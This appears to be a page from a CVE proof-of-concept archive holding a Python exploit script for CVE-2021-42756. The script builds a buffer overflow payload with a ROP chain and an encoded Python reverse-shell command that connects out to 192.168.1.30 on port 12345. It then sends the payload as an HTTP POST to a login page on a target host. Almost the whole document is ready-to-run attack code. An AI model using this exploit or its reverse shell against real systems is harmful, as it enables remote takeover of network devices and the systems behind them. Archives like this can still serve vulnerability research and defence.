4837 Total CVEs
26 Years
GitHub
Home / 2021 / CVE-2021-42756
README.md
Rendering markdown...
POC / CVE-2021-42756.py PY
⬇ Raw GitHub ✕ Close 
import socket

def dissolve_str(input_s):
    output_s = ''
    dslv_map = [(0x79,0x57),(0x79,0x58),(0x79,0x59),(0x79,0x5a),
        (0x79,0x5b),(0x79,0x5c),(0x79,0x5d),(0x79,0x5e),
        (0x79,0x5f),(0x79,0x60),(0x79,0x61),(0x79,0x62),
        (0x79,0x63),(0x79,0x64),(0x79,0x65),(0x79,0x66),
        (0x79,0x67),(0x79,0x68),(0x79,0x69),(0x79,0x6a),
        (0x79,0x6b),(0x79,0x6c),(0x79,0x6d),(0x79,0x6e),
        (0x79,0x6f),(0x79,0x70),(0x79,0x71),(0x79,0x72),
        (0x79,0x73),(0x79,0x74),(0x79,0x75),(0x79,0x76),
        (0x5b,0x30),(0x5b,0x31),(0x5b,0x32),(0x5b,0x33),
        (0x7b,0x7b),(0x7b,0x7c),(0x7b,0x7d),(0x7b,0x7e),
        (0x7b,0x3f),(0x7b,0x40),(0x7b,0x41),(0x7b,0x42),
        (0x7b,0x43),(0x7b,0x44),(0x7b,0x45),(0x7b,0x46),
        (0x7b,0x47),(0x7b,0x48),(0x7b,0x49),(0x7b,0x4a),
        (0x7b,0x4b),(0x7b,0x4c),(0x7b,0x4d),(0x7b,0x4e),
        (0x7b,0x4f),(0x7b,0x50),(0x7b,0x51),(0x7b,0x52),
        (0x7b,0x53),(0x7b,0x54),(0x7b,0x55),(0x7b,0x56),
        (0x7b,0x57),(0x7b,0x58),(0x7b,0x59),(0x7b,0x5a),
        (0x7b,0x5b),(0x7b,0x5c),(0x7b,0x5d),(0x7b,0x5e),
        (0x7b,0x5f),(0x7b,0x60),(0x4d,0x41),(0x4d,0x42),
        (0x4d,0x43),(0x4d,0x44),(0x4d,0x45),(0x4d,0x46),
        (0x4d,0x47),(0x4d,0x48),(0x4d,0x49),(0x4d,0x4a),
        (0x4d,0x4b),(0x4d,0x4c),(0x4d,0x4d),(0x4d,0x4e),
        (0x4d,0x4f),(0x4d,0x50),(0x4d,0x51),(0x4d,0x52),
        (0x4d,0x53),(0x4d,0x54),(0x4d,0x55),(0x4d,0x56)]
    for x in input_s:
        idx = ord(x) - 0x20
        x = dslv_map[idx][0]
        y = dslv_map[idx][1]
        output_s += chr(x)
        output_s += chr(y)
    return output_s.encode()
    

def craft_payload():
    base = 0x555555554000               # disable ASLR for PoC

    g_00 = 0x000000000011bbd0           # push rsp ; pop rax ; ret
    g_01 = 0x000000000011aad5           # pop rdi ; ret
    g_02 = 0x00000000008e14e5           # add rdi, rax ; cmp rdx, rdi ; setae al ; ret
    addr_sys = 0x1179a0

    g_l = [g_00, g_01, g_02, addr_sys]
    for i in range(len(g_l)):
        addr = f'{base + g_l[i]:0>16x}'
        g_l[i] = ''.join(reversed([addr[i:i+2] for i in range(0, len(addr),2)])).encode()
    
    p = b'username=r00t&mitb_password_hidden='
    p += b'A'*0x400*2
    p += b'B'*8*2
    p += g_l[0]
    p += g_l[1]
    p += b'2000000000000000'
    p += g_l[2]
    p += g_l[3]

    cmd = "/bin/python -c 'import socket,sys,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"192.168.1.30\",12345));[os.dup2(s.fileno(),x) for x in range(3)];os.execl(\"/bin/sh\",\"sh\");'"
    d_cmd = dissolve_str(cmd)
    p += d_cmd

    return p


def trigger_vuln():
    print('[>] PoC for CVE-2021-42756')

    payload = craft_payload()
    payload_len = str(len(payload)).encode()

    data = b'POST /dvwa/login.php HTTP/1.1\r\nHost: 192.168.1.10\r\nContent-Length: '
    data += payload_len + b'\r\n\r\n'
    data += payload
    server_addr = ('192.168.1.10', 80)
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        sock.connect(server_addr)
        sock.sendall(data)
    except:
        pass

trigger_vuln()